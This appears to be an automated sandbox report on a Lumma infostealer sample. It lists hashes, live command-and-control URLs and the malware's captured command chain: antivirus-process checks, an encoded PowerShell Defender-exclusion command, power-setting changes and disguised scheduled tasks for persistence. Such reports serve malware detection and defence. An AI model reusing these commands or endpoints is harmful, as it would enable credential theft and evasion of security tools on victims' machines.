Overview
overview
10Static
static
1ETool.exe
windows10-2004-x64
10$TEMP/Exposure.doc
windows10-2004-x64
1$TEMP/Surrey.doc
windows10-2004-x64
1$TEMP/Tramadol.doc
windows10-2004-x64
1SpringPrer...ck.doc
windows10-2004-x64
1SpringPrer...ge.doc
windows10-2004-x64
1SpringPrer...ne.doc
windows10-2004-x64
1SpringPrer...em.doc
windows10-2004-x64
1SpringPrer...on.doc
windows10-2004-x64
1SpringPrer...nt.doc
windows10-2004-x64
1Analysis
-
max time kernel
102s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
10/04/2025, 17:43
Static task
static1
Behavioral task
behavioral1
Sample
ETool.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
$TEMP/Exposure.doc
Resource
win10v2004-20250313-en
Behavioral task
behavioral3
Sample
$TEMP/Surrey.doc
Resource
win10v2004-20250314-en
Behavioral task
behavioral4
Sample
$TEMP/Tramadol.doc
Resource
win10v2004-20250314-en
Behavioral task
behavioral5
Sample
SpringPrerequisite/Click.doc
Resource
win10v2004-20250314-en
Behavioral task
behavioral6
Sample
SpringPrerequisite/Dosage.doc
Resource
win10v2004-20250313-en
Behavioral task
behavioral7
Sample
SpringPrerequisite/Hurricane.doc
Resource
win10v2004-20250314-en
Behavioral task
behavioral8
Sample
SpringPrerequisite/Jerusalem.doc
Resource
win10v2004-20250314-en
Behavioral task
behavioral9
Sample
SpringPrerequisite/Replication.doc
Resource
win10v2004-20250314-en
Behavioral task
behavioral10
Sample
SpringPrerequisite/Vincent.doc
Resource
win10v2004-20250314-en
General
-
Target
ETool.exe
-
Size
127.0MB
-
MD5
9201fd8086ed6252d3fd04426a89aca6
-
SHA1
ef2439d69b10217304d86f1d0a084a3525a2bf59
-
SHA256
2327e82bad470c955053d011b1b23481b16ace2a30ac1ec655d5ac457213d0cf
-
SHA512
eb6102d67f9d8067d62dfba0127669491a215fd2b4470c16a4cd90d499c09be594856da2a14d3d31c71ee8254d3dc46e8ecfcc8570c6111aa19edfb49b3675dc
-
SSDEEP
24576:10aVFANlrs0kwTD+r0DyheNjEmqj4tC8yjarmo8nf+Z82vIW9:1mNipwTD+r0+hiEmE4tCtjar0f+Z8vW9
Malware Config
Extracted
lumma
https://infuzoriatufelka.com/api
https://soursopsf.run/gsoiao
https://changeaie.top/geps
https://easyupgw.live/eosz
https://liftally.top/xasj
https://upmodini.digital/gokk
https://salaccgfa.top/gsooz
https://zestmodp.top/zeda
https://xcelmodo.run/nahd
Signatures
-
Lumma family
-
Downloads MZ/PE file 3 IoCs
flow pid Process 46 5472 Scales.com 64 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 63 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation ETool.exe -
Executes dropped EXE 2 IoCs
pid Process 5472 Scales.com 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 61 pastebin.com 62 pastebin.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 1 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1740 cmd.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 1068 tasklist.exe 2908 tasklist.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\DonnaPanties ETool.exe File opened for modification C:\Windows\SpencerMotel ETool.exe File opened for modification C:\Windows\AlotPackage ETool.exe File opened for modification C:\Windows\HartSuffering ETool.exe File opened for modification C:\Windows\NiSubmission ETool.exe File opened for modification C:\Windows\StoriesNowhere ETool.exe File opened for modification C:\Windows\StrengthPremier ETool.exe File opened for modification C:\Windows\LockingAbsent ETool.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ETool.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Scales.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3920 schtasks.exe 4416 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 5472 Scales.com 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 3476 powershell.exe 3476 powershell.exe 3476 powershell.exe 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1068 tasklist.exe Token: SeDebugPrivilege 2908 tasklist.exe Token: SeImpersonatePrivilege 5472 Scales.com Token: SeImpersonatePrivilege 5472 Scales.com Token: SeDebugPrivilege 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe Token: SeDebugPrivilege 3476 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 5472 Scales.com 5472 Scales.com 5472 Scales.com -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 5472 Scales.com 5472 Scales.com 5472 Scales.com -
Suspicious use of WriteProcessMemory 57 IoCs
description pid Process procid_target PID 5692 wrote to memory of 2668 5692 ETool.exe 89 PID 5692 wrote to memory of 2668 5692 ETool.exe 89 PID 5692 wrote to memory of 2668 5692 ETool.exe 89 PID 2668 wrote to memory of 1068 2668 cmd.exe 91 PID 2668 wrote to memory of 1068 2668 cmd.exe 91 PID 2668 wrote to memory of 1068 2668 cmd.exe 91 PID 2668 wrote to memory of 3300 2668 cmd.exe 92 PID 2668 wrote to memory of 3300 2668 cmd.exe 92 PID 2668 wrote to memory of 3300 2668 cmd.exe 92 PID 2668 wrote to memory of 2908 2668 cmd.exe 94 PID 2668 wrote to memory of 2908 2668 cmd.exe 94 PID 2668 wrote to memory of 2908 2668 cmd.exe 94 PID 2668 wrote to memory of 6024 2668 cmd.exe 95 PID 2668 wrote to memory of 6024 2668 cmd.exe 95 PID 2668 wrote to memory of 6024 2668 cmd.exe 95 PID 2668 wrote to memory of 4500 2668 cmd.exe 96 PID 2668 wrote to memory of 4500 2668 cmd.exe 96 PID 2668 wrote to memory of 4500 2668 cmd.exe 96 PID 2668 wrote to memory of 4672 2668 cmd.exe 97 PID 2668 wrote to memory of 4672 2668 cmd.exe 97 PID 2668 wrote to memory of 4672 2668 cmd.exe 97 PID 2668 wrote to memory of 4700 2668 cmd.exe 98 PID 2668 wrote to memory of 4700 2668 cmd.exe 98 PID 2668 wrote to memory of 4700 2668 cmd.exe 98 PID 2668 wrote to memory of 5156 2668 cmd.exe 99 PID 2668 wrote to memory of 5156 2668 cmd.exe 99 PID 2668 wrote to memory of 5156 2668 cmd.exe 99 PID 2668 wrote to memory of 2300 2668 cmd.exe 100 PID 2668 wrote to memory of 2300 2668 cmd.exe 100 PID 2668 wrote to memory of 2300 2668 cmd.exe 100 PID 2668 wrote to memory of 5472 2668 cmd.exe 101 PID 2668 wrote to memory of 5472 2668 cmd.exe 101 PID 2668 wrote to memory of 5472 2668 cmd.exe 101 PID 2668 wrote to memory of 2520 2668 cmd.exe 102 PID 2668 wrote to memory of 2520 2668 cmd.exe 102 PID 2668 wrote to memory of 2520 2668 cmd.exe 102 PID 5472 wrote to memory of 4920 5472 Scales.com 112 PID 5472 wrote to memory of 4920 5472 Scales.com 112 PID 5472 wrote to memory of 4920 5472 Scales.com 112 PID 4920 wrote to memory of 1740 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 114 PID 4920 wrote to memory of 1740 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 114 PID 4920 wrote to memory of 1740 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 114 PID 1740 wrote to memory of 3476 1740 cmd.exe 116 PID 1740 wrote to memory of 3476 1740 cmd.exe 116 PID 1740 wrote to memory of 3476 1740 cmd.exe 116 PID 4920 wrote to memory of 3316 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 118 PID 4920 wrote to memory of 3316 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 118 PID 4920 wrote to memory of 3316 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 118 PID 4920 wrote to memory of 3544 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 119 PID 4920 wrote to memory of 3544 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 119 PID 4920 wrote to memory of 3544 4920 B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe 119 PID 3316 wrote to memory of 3920 3316 cmd.exe 122 PID 3316 wrote to memory of 3920 3316 cmd.exe 122 PID 3316 wrote to memory of 3920 3316 cmd.exe 122 PID 3544 wrote to memory of 4416 3544 cmd.exe 123 PID 3544 wrote to memory of 4416 3544 cmd.exe 123 PID 3544 wrote to memory of 4416 3544 cmd.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\ETool.exe"C:\Users\Admin\AppData\Local\Temp\ETool.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5692 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Tramadol.doc Tramadol.doc.bat & Tramadol.doc.bat2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"3⤵
- System Location Discovery: System Language Discovery
PID:3300
-
-
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"3⤵
- System Location Discovery: System Language Discovery
PID:6024
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3556873⤵
- System Location Discovery: System Language Discovery
PID:4500
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Reservation.doc3⤵
- System Location Discovery: System Language Discovery
PID:4672
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "COVERAGE" Nursery3⤵
- System Location Discovery: System Language Discovery
PID:4700
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 355687\Scales.com + Tractor + Scheduled + Included + Handjobs + Cooperation + Den + Mysql + Wrote + Played + Economic 355687\Scales.com3⤵
- System Location Discovery: System Language Discovery
PID:5156
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Jerusalem.doc + ..\Replication.doc + ..\Dosage.doc + ..\Hurricane.doc + ..\Surrey.doc + ..\Click.doc + ..\Exposure.doc + ..\Vincent.doc Q3⤵
- System Location Discovery: System Language Discovery
PID:2300
-
-
C:\Users\Admin\AppData\Local\Temp\355687\Scales.comScales.com Q3⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5472 -
C:\Users\Admin\AppData\Local\Temp\B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe"C:\Users\Admin\AppData\Local\Temp\B34EUXH5QP9PCYOWK6F7ED91RZHWVK.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAHUAWgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABhAGgAVABWAFcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAQwBHAGgAZQBvADYAbwBXAHgAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAzAEEAMwBTAFoAMAAyAGYARwA4AG4AIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off5⤵
- Power Settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHUAWgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABhAGgAVABWAFcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAQwBHAGgAZQBvADYAbwBXAHgAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAzAEEAMwBTAFoAMAAyAGYARwA4AG4AIwA+AA=="6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3476
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3316 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3920
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7251" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7251" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4416
-
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 53⤵
- System Location Discovery: System Language Discovery
PID:2520
-
-
Network
MITRE ATT&CK Enterprise v16
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
558KB
MD517ed7c15bdc5e0512a480cb02ec9b411
SHA19b44723aba424c3ea914225f8306c60648b768b3
SHA256903f2f99d682f3c76bd389f426c29eb12e5a648ef2c73f4f60733e25054df5a9
SHA5128da6e456c25bcfc2041d423b59f227b9f600ff77c998bc9c284688b2e5adfc6af06f7ff586de28865dfdd9f7dbcad172c225d47b754a13414411ed0e3a8a0b13
-
Filesize
2KB
MD505438ce0a5d4263732ffb7e5e9436826
SHA136bb5879fc36c85d53d8ae34fca4c232eb793766
SHA256cc7426bcdc08c907f4e02a1e90961a3f8a074643491df2197856af90ab8f4d8d
SHA5124a5fbc56eea46ae894354201db598efeb0a6dd04245c5f68603254aec31210a44dd8b2d1e36845f87c6fd8e219744a491bb4a808574f2dca2938f58bc0a63def
-
Filesize
925KB
MD562d09f076e6e0240548c2f837536a46a
SHA126bdbc63af8abae9a8fb6ec0913a307ef6614cf2
SHA2561300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49
SHA51232de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f
-
Filesize
21KB
MD5c11a82d699a06d9b8ba4296e0c562ae4
SHA1e91963fe8def3ed151333a6a66d005237600ba30
SHA256483b1d7dac70de82e9b22a0c1ed775cf7e10b0a3790c5aa1b9215dbcd1754302
SHA512cc8644279ea2cebf70f594f6cc48d6ebbc10d036b7dcf1008fc05565da85cc36f7e8af7faa49b7c117c9a6ac94d7c007a99b53ec1dd668a7f8c28dc25b410a54
-
Filesize
76KB
MD5b6a810b4b1ce28f016bccff1d52f2147
SHA15590bc8521c201f44ccf9427ce34acfb35c66db2
SHA2563f640b7668a38ec1b3f2dfd2a4a2032ce85c503fbcd7dd27bb414cede27a5e8e
SHA51245822bfd060ffd528e96d76cb2b59a0c07b038451bf984cf13d617c59188854cf657b4e9a72d99b7d81fc147ef451588568454bc3b9cff5522eb49156d698464
-
Filesize
57KB
MD52c013b0d05a286de07e9c28383da5cd1
SHA1a7a2cea6343ba4569b66ad16a5d5360aa8c64851
SHA25693c8ea0fe836b687f332f708601266f6fbe9c9d433a091a0248d3d306322446e
SHA51221ac2b8dfd900452f6e6be694321a8119b062cf2cd9486ee2b0929dfaca65db207d1b43ddb996597ae3573991fb73904a49f8d9758bb2bcfe535f75c00ad78fb
-
Filesize
55KB
MD508096a4d58c28e9547fce2c1614d50f7
SHA143d41815af8a0e90713e8f34f2bf4958b2474ec8
SHA256efa6517b34379b6211fbc15d6af676a1d4414645ca9408d953975d479295d0ff
SHA512efdd6f60f38863c043693571292d0316b88513f0abc8c532199f466eaa58084a08675135d716d86c054f9ff2f2bb5bddc7db8ecc70a9ad10b332f38f9967bd1b
-
Filesize
86KB
MD5a01cca989c46bf218b897676b4ff419c
SHA1540fb787b394095b4cb1f83df03c6e4d621f229e
SHA256e70a95895f6ea8492644c77f2b5763c38bf069fb78581474f855f82362e5696b
SHA512bb0a6b6512cd81cb1f49aea427c2e3cecbdc83ea5de1c1f01ccbb6968f545a88cfd09ecc39f40141174b9c277a3bf8aecda8bbb6d11cb17a928d142dda1b6aaf
-
Filesize
47KB
MD5cde469c4729da6e48c8ddc8b444b05ba
SHA1cf053ff089b945f4ca3329ec1db29dfe8875a5e4
SHA256d380e999bbf643225e7a3a709318524d8a2337e0c3b1aa2f61e3971a90eaf7b1
SHA5127670efcb13d6789bcf5c7da9e2cab53b2f015c11892a493285e91422e3d6f857c82d041fb484d547cf5fcfb093ec2e1bee98939f6adec9721f2a3ed43dbf0afc
-
Filesize
60KB
MD5021f91244aa361e6766c1347664b688a
SHA1a71c6f54dab43cf2f478b7b063392fcec9a9cfd5
SHA256829bc78f9621aba3d57f0ce61f571d573dde9016977d4e184f975787eba3ae85
SHA5120d744ee8cda9f71b2e55414d40fb9c35815082312df07e907752e7704552850adfb6406d6102ae5fd363537a3878a3e5a761af3588e3bfba4156b521bb657901
-
Filesize
105KB
MD5e0fe8e76c5caa5837fc73b82ad45df24
SHA1fb65c8dd24376bd120197a87dce1a57298ed6642
SHA2563f383ecedefdabb7785895ad675c801fb53eccc661378c34662a9d3e4f1e9af4
SHA512fc65ddc7cc8cc0b17be7558de040f2eb3eca37720490b5791a11f4fd44253e71e5061c104e79955c0f435b2366de431b09a00340f057cbd1cb2404e9b677dbf7
-
Filesize
59KB
MD53ab779ed45de152d80aa68e8d5b6b025
SHA1997ddc9b0841c067fef81dbc683076e115d06407
SHA2561ff967545525b752f371b319dcc8efe78d2f35b5049c8aef312beb4b811d00bf
SHA5120837f528ef92f43630b5e4f3c667e3963f85487090f877916f2d2bec5233b61312292fb2e6c9ff67c55b56c7004d326219eaaca8748a3cadaadf6b120f350482
-
Filesize
111KB
MD5c96f1dd9ac812356675dee490c5fface
SHA192ea1ba6532113d3a9f8428b0e4b00fafbdbe1b3
SHA2560a4fb8bc78d3c8b61e780c36939a2a899b4ef9f06d75ffc8943e8b8da65de81b
SHA512ed60587901754683f552c0968006ef68a28827c0d98b360b0b0ad5725dc3177fd55a2f3be493ef7702e4c49872ea442ad9a3c1022f2a33f2318c3ec415121637
-
Filesize
73KB
MD5a41bca9961381c4af3948289c8353483
SHA10cdf822532be14b318f7cfd2ad7b3dbe6a11772c
SHA25658c64d95f86d2fcc3f2d9e9c4324944b1d57ab2dc299ee32264f2b78fc7f2df8
SHA512b6e51e926d74a17522127a72b1d354ba0c240107f5094746800cc61928fb057dda79477fe4d16aa93e6b29117aa4ab26c34733f87a6df5948ff631ff0d01469c
-
Filesize
125KB
MD58782d1f89f36cbf72ef5da083de26a3f
SHA1f7f6845daa434caae6e949b4e1c65e7300d7ec17
SHA256e9dd0503bd6064de489feb2aadc830a16cbd469a9b193d7c18cc3a27ce395ece
SHA512e28798581961c930af0883668155ded48e9e92a4e861739275bd9d996a670d6791c645b797f2a27a9d7b628dab20fb988be41c38b816d71f5d9d236e8616b98f
-
Filesize
2KB
MD5f47b845c5e8554a177fec081cedeb71e
SHA1d10ca455ff5496212178268400fef2cfe2072f8c
SHA25651d80037de22922d36ef714253938189984d3a5ad66af17c7557019d0358892e
SHA5122d292bb4de06f03d64210d0c2e16a5074e8e14c554c09a1b878729c24b63fc10a4aaefd75cf70bfdb51d4fba3528ad1323083218ca4e1a8bcfd93a6c0e580ad7
-
Filesize
101KB
MD5bce7617303fc32b8c704302b4984b966
SHA13d49fef2af2f39073af581593f48901a50d25e1b
SHA25697b038848562743ae27ef664e4388f42ce2d8a70cdfca44ea8257964addf024c
SHA5128cc6889bc8f5a8d6dfb83f9934b2097e04151a6bbac075dfcff7c5dd5234a219d2d1ac63522d54df7b6f9a558e3bfe21809d9b236b30ce2ba0c644f9ef19dca8
-
Filesize
60KB
MD53aacde3acd5fb86ac3ff0039ec0c1c25
SHA1f46599080cd55389392ce516818c9385e4f44037
SHA256a9f85f7d7beaac38d8fa0c43368207d23d515079125ad2124ead74290c7ad6a9
SHA5123e592723efee5193f5bb80db3d85ce44db4ba0d8583f8d8399ebb7a2c6284fb9463992d207849c0c7cb369a9f692243a15fe45f0ceaf7eb00de12ab5322a00f5
-
Filesize
477KB
MD55a3791bcb704e00eb846e1b5c3e1d6c1
SHA1f38b5b92e8b25466984961e6206b34d145cb9c1f
SHA256ac33bc03177daa498fb52d024470427f13266b568a3eca69827fb9cade76da3b
SHA512b556a60bac117f607f36d7e2e2ed15d880176d9cee8f645666bb2df57c6d2e500280a385fe1f092957912275cbad4648b5adff30be769e2a1b29c9d00519e586
-
Filesize
92KB
MD50431711cc2ed77812dd2194c004632ea
SHA168ef35e2e9a3c7babd947811d223d68987f82c8e
SHA2566f7af45c6a5b1c33e1aa4585ae479223e052fa27f6c054a104e795268b85f7ad
SHA512b5d9505f38c3ef384ee4cf7c1185206f2b48ef7fba34aaa8a56f50cdbc4a859eb18c4931ada70365fd2b8f5f4b57c8e455894f153c51a227d8ba076a07a65446
-
Filesize
86KB
MD52562d60d0ce8500a33f91910eb602e72
SHA16f54357ee23017093e9f6e23053fb5bb6c714487
SHA256175779c0f23e28a62fd2b7e9f7a04756b671292dd19ef3e074efe1f90aa6e216
SHA512677607ecd8c411abee75c040a42cfbce6bfd7e9b01cba2f8635eac2d76326b39a89635b6d2676a386b4ffbe86aeea91831c931ba2f14ee83661a8e89497a9670
-
Filesize
148KB
MD546fe71d831ce773e0c6158f0bd5fce93
SHA14550dcbbdcb910fa633b264b8a5803e555ca3d9c
SHA2566a9ad1a1ad8cac36aa1d242b618eee2fe066d85aff7060236a0f1747ab5e8527
SHA5121c9a41e2c242b20fcf8d2b9e18c0da361eb2ffddf3dc1fab6056495184b74afe655d4dbd789c5c4e528dce9272708b25fb4d621924a7bae214b4b5c68ec9eee8
-
Filesize
30KB
MD5ba928ff2ffaf2db2cfc33eed3c33f4f0
SHA104cb1297b00303d0144223848acb22f1cf5be258
SHA256bf25816ff4a451c19c7f964d4fb5bd8d35fc4311835769d5aae759d49313852b
SHA512e573ea80f10b54139f47d8cfdcf20d68824ff11a1fee94f34de77f1fc2b6f7bc62ca4ca7769a98ac4c780cf632244684e601e503a522a5043e8e56961ea7a120
-
Filesize
58KB
MD544a7c75577931d2fa7f514978c9c0a3b
SHA1247058c24da6e0f8b29edfc6fd14558575c145b5
SHA256fc668ed3cd65fe5b25f6412c122dabe4c58b3b04a5a42b662930a810241907fe
SHA51203b52a8207e92bf6cc1d75aaf0f77f827edba43b81ddbe5d3ac53590196df563275b08bb73a51c3152efe501f621b983937db21f8d09cc58ae0e2d66646050c8
-
Filesize
81KB
MD5297a4a46f4e17540a0f907003279f1ea
SHA16e8355a1c82015b1b3dc4e18501817a4371f62b6
SHA256079d377b5b5e7736f159f9acc1dc17273afa3f66a46ecb8cfd87407414da2d5d
SHA512e0faac2b09a68d753c3a9f5d78584ca0b1e633931a31baf1f68ba6eed6796c0bec5f80bce8b8c6f3fb303924869ac83819794488f4c490fafd5ebd4e2611932f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82